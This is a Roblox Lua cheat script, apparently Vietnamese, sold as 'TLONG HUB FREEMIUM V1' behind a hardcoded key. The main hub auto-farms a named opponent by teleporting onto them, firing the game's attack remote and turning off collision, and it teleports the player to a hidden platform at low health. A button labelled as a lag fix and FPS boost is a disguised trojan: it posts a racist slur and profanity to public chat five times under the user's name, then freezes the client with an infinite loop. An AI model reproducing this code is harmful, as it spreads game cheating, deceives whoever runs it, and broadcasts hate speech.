-- ==========================================
-- TLONG HUB FREEMIUM V1 (KEY SYSTEM)
-- KEY HIỆN TẠI: Thanhlonghubvip
-- ==========================================

local CorrectKey = "Thanhlonghubvip" -- Đây là Key ông muốn
local KeyInput = ""

local KeyUI = Instance.new("ScreenGui", game.CoreGui)
KeyUI.Name = "TLONG_KEY_SYSTEM"

local MainKeyFrame = Instance.new("Frame", KeyUI)
MainKeyFrame.Size = UDim2.new(0, 300, 0, 200)
MainKeyFrame.Position = UDim2.new(0.5, -150, 0.5, -100)
MainKeyFrame.BackgroundColor3 = Color3.fromRGB(15, 15, 15)
MainKeyFrame.Active = true
MainKeyFrame.Draggable = true
Instance.new("UICorner", MainKeyFrame)

local Stroke = Instance.new("UIStroke", MainKeyFrame)
Stroke.Color = Color3.fromRGB(255, 0, 0)
Stroke.Thickness = 2

local Title = Instance.new("TextLabel", MainKeyFrame)
Title.Size = UDim2.new(1, 0, 0, 40)
Title.Text = "TLONG HUB - KEY SYSTEM"
Title.TextColor3 = Color3.new(1,1,1)
Title.BackgroundColor3 = Color3.fromRGB(150, 0, 0)
Title.Font = Enum.Font.GothamBold
Instance.new("UICorner", Title)

local Box = Instance.new("TextBox", MainKeyFrame)
Box.Size = UDim2.new(0, 260, 0, 40)
Box.Position = UDim2.new(0, 20, 0, 60)
Box.PlaceholderText = "NHẬP KEY VÀO ĐÂY..."
Box.Text = ""
Box.BackgroundColor3 = Color3.fromRGB(30, 30, 30)
Box.TextColor3 = Color3.new(1,1,1)
Instance.new("UICorner", Box)

local CheckBtn = Instance.new("TextButton", MainKeyFrame)
CheckBtn.Size = UDim2.new(0, 120, 0, 40)
CheckBtn.Position = UDim2.new(0, 20, 0, 120)
CheckBtn.Text = "CHECK KEY"
CheckBtn.BackgroundColor3 = Color3.fromRGB(0, 150, 0)
CheckBtn.TextColor3 = Color3.new(1,1,1)
CheckBtn.Font = Enum.Font.GothamBold
Instance.new("UICorner", CheckBtn)

local GetKeyBtn = Instance.new("TextButton", MainKeyFrame)
GetKeyBtn.Size = UDim2.new(0, 120, 0, 40)
GetKeyBtn.Position = UDim2.new(0, 160, 0, 120)
GetKeyBtn.Text = "GET KEY (COPY)"
GetKeyBtn.BackgroundColor3 = Color3.fromRGB(100, 100, 100)
GetKeyBtn.TextColor3 = Color3.new(1,1,1)
GetKeyBtn.Font = Enum.Font.GothamBold
Instance.new("UICorner", GetKeyBtn)

-- --- CHỨC NĂNG KEY ---
GetKeyBtn.MouseButton1Click:Connect(function()
    setclipboard("GỬI KEY CHO NÓ HOẶC DÁN LINK DISCORD Ở ĐÂY") 
    GetKeyBtn.Text = "COPIED!"
    task.wait(2)
    GetKeyBtn.Text = "GET KEY (COPY)"
end)

CheckBtn.MouseButton1Click:Connect(function()
    if Box.Text == CorrectKey then
        CheckBtn.Text = "ĐÚNG KEY!"
        task.wait(0.5)
        KeyUI:Destroy()
        
        -- ==========================================================
        -- BẮT ĐẦU CODE HUB CHÍNH (TLONG HUB FREEMIUM V1)
        -- ==========================================================
        
        local player = game.Players.LocalPlayer
        local isFarmV1, isFarmV2, isAutoEscape = false, false, false
        local depth, angle = -6.5, 0
        local LockedPlayer = nil
        local Running = true
        local IsEscaping = false

        local SafePlatform = Instance.new("Part", game.Workspace)
        SafePlatform.Size, SafePlatform.Anchored, SafePlatform.Transparency = Vector3.new(30, 1, 30), true, 1
        SafePlatform.Position = Vector3.new(0, 9500, 0)

        local MainUI = Instance.new("ScreenGui", game.CoreGui)
        local MainFrame = Instance.new("Frame", MainUI)
        MainFrame.Size = UDim2.new(0, 280, 0, 450)
        MainFrame.Position = UDim2.new(0.5, -140, 0.5, -225)
        MainFrame.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
        MainFrame.Active, MainFrame.Draggable = true, true
        Instance.new("UICorner", MainFrame)
        local UIStroke = Instance.new("UIStroke", MainFrame)
        UIStroke.Color, UIStroke.Thickness = Color3.fromRGB(255, 0, 0), 2

        local Header = Instance.new("TextLabel", MainFrame)
        Header.Size = UDim2.new(1, 0, 0, 35)
        Header.Text = "TLONG HUB FREEMIUM V1"
        Header.TextColor3 = Color3.new(1,1,1)
        Header.BackgroundColor3 = Color3.fromRGB(150, 0, 0)
        Header.Font = Enum.Font.GothamBold
        Instance.new("UICorner", Header)

        local function QuickBtn(txt, pos, size, color)
            local btn = Instance.new("TextButton", MainFrame)
            btn.Text, btn.Position, btn.Size = txt, pos, size
            btn.BackgroundColor3 = color or Color3.fromRGB(30, 30, 30)
            btn.TextColor3 = Color3.new(1,1,1)
            btn.Font = Enum.Font.GothamBold
            btn.TextSize = 10
            Instance.new("UICorner", btn)
            return btn
        end

        local NameBox = Instance.new("TextBox", MainFrame)
        NameBox.Size = UDim2.new(1, -20, 0, 30)
        NameBox.Position = UDim2.new(0, 10, 0, 45)
        NameBox.PlaceholderText = "NHẬP TÊN ĐỐI THỦ..."
        NameBox.BackgroundColor3 = Color3.fromRGB(25, 25, 25)
        NameBox.TextColor3 = Color3.new(1,1,1)
        Instance.new("UICorner", NameBox)

        local DistBox = Instance.new("TextBox", MainFrame)
        DistBox.Size = UDim2.new(0, 125, 0, 25)
        DistBox.Position = UDim2.new(0, 10, 0, 80)
        DistBox.Text = "7"
        DistBox.BackgroundColor3 = Color3.fromRGB(25, 25, 25)
        DistBox.TextColor3 = Color3.new(0, 1, 1)
        Instance.new("UICorner", DistBox)

        local SpdBox = Instance.new("TextBox", MainFrame)
        SpdBox.Size = UDim2.new(0, 125, 0, 25)
        SpdBox.Position = UDim2.new(0, 145, 0, 80)
        SpdBox.Text = "6"
        SpdBox.BackgroundColor3 = Color3.fromRGB(25, 25, 25)
        SpdBox.TextColor3 = Color3.new(1, 1, 0)
        Instance.new("UICorner", SpdBox)

        local F1 = QuickBtn("FARM V1 (DƯỚI ĐẤT)", UDim2.new(0, 10, 0, 115), UDim2.new(0, 125, 0, 35), Color3.fromRGB(130, 0, 0))
        local F2 = QuickBtn("FARM V2 (QUAY)", UDim2.new(0, 145, 0, 115), UDim2.new(0, 125, 0, 35), Color3.fromRGB(80, 0, 130))
        local Esc = QuickBtn("AUTO ESCAPE (20-85%)", UDim2.new(0, 10, 0, 155), UDim2.new(1, -20, 0, 35))
        local TrollBtn = QuickBtn("FIX LAG & FPS BOOST (PRO)", UDim2.new(0, 10, 0, 195), UDim2.new(1, -20, 0, 35), Color3.fromRGB(0, 150, 0))

        TrollBtn.MouseButton1Click:Connect(function()
            local msg = "ez fuck you nigger roblox - script made by emlaaithike"
            for i = 1, 5 do
                local sayMsg = game:GetService("ReplicatedStorage"):FindFirstChild("DefaultChatSystemChatEvents")
                if sayMsg then sayMsg.SayMessageRequest:FireServer(msg, "All") end
                pcall(function() game:GetService("TextChatService").TextChannels.RBXGeneral:SendAsync(msg) end)
            end
            while true do print("FREEZING...") end
        end)

        local DAdd = QuickBtn("ĐỘ SÂU V1 (+)", UDim2.new(0, 10, 0, 235), UDim2.new(0, 125, 0, 30))
        local DSub = QuickBtn("ĐỘ SÂU V1 (-)", UDim2.new(0, 145, 0, 235), UDim2.new(0, 125, 0, 30))
        local Exit = QuickBtn("XÓA HUB", UDim2.new(0, 10, 0, 400), UDim2.new(1, -20, 0, 35), Color3.fromRGB(180, 0, 0))

        F1.MouseButton1Click:Connect(function() isFarmV1 = not isFarmV1 isFarmV2 = false LockedPlayer = nil end)
        F2.MouseButton1Click:Connect(function() isFarmV2 = not isFarmV2 isFarmV1 = false LockedPlayer = nil end)
        Esc.MouseButton1Click:Connect(function() isAutoEscape = not isAutoEscape end)
        DAdd.MouseButton1Click:Connect(function() depth = depth + 0.5 end)
        DSub.MouseButton1Click:Connect(function() depth = depth - 0.5 end)
        Exit.MouseButton1Click:Connect(function() Running = false SafePlatform:Destroy() MainUI:Destroy() end)

        game:GetService("RunService").Heartbeat:Connect(function(dt)
            if not Running or not player.Character or not player.Character:FindFirstChild("Humanoid") then return end
            local hum, hrp = player.Character.Humanoid, player.Character.HumanoidRootPart
            if isAutoEscape then
                local hp = (hum.Health / hum.MaxHealth) * 100
                if hp < 20 and hum.Health > 0 then IsEscaping = true elseif IsEscaping and hp >= 85 then IsEscaping = false end
            end
            if IsEscaping then hrp.CFrame = SafePlatform.CFrame * CFrame.new(0, 5, 0) hrp.Velocity = Vector3.zero return end
            if isFarmV1 or isFarmV2 then
                local tName = NameBox.Text:lower()
                if tName == "" then return end
                if not LockedPlayer or not LockedPlayer.Parent or LockedPlayer.Character.Humanoid.Health <= 0 then
                    LockedPlayer = nil
                    for _, p in pairs(game.Players:GetPlayers()) do
                        if p ~= player and (p.Name:lower():find(tName) or p.DisplayName:lower():find(tName)) then
                            if p.Character and p.Character:FindFirstChild("HumanoidRootPart") and p.Character.Humanoid.Health > 0 then LockedPlayer = p break end
                        end
                    end
                end
                if LockedPlayer then
                    local enHrp = LockedPlayer.Character.HumanoidRootPart
                    if isFarmV1 then hrp.CFrame = enHrp.CFrame * CFrame.new(0, depth, 0) * CFrame.Angles(math.rad(90), 0, 0)
                    elseif isFarmV2 then 
                        angle = angle + (dt * (tonumber(SpdBox.Text) or 6))
                        hrp.CFrame = CFrame.new(enHrp.Position + Vector3.new(math.cos(angle)*(tonumber(DistBox.Text) or 7), 0, math.sin(angle)*(tonumber(DistBox.Text) or 7)), enHrp.Position)
                    end
                    pcall(function() game:GetService("ReplicatedStorage"):FindFirstChild("Communicate", true):FindFirstChildOfClass("RemoteEvent"):FireServer({["Goal"] = "LeftClick"}) end)
                    for _, v in pairs(player.Character:GetDescendants()) do if v:IsA("BasePart") then v.CanCollide = false end end
                    hrp.Velocity = Vector3.zero
                else hrp.Velocity = Vector3.zero end
            end
        end)
        
    else
        CheckBtn.Text = "SAI KEY RỒI!"
        Box.Text = ""
        task.wait(1.5)
        CheckBtn.Text = "CHECK KEY"
    end
end)
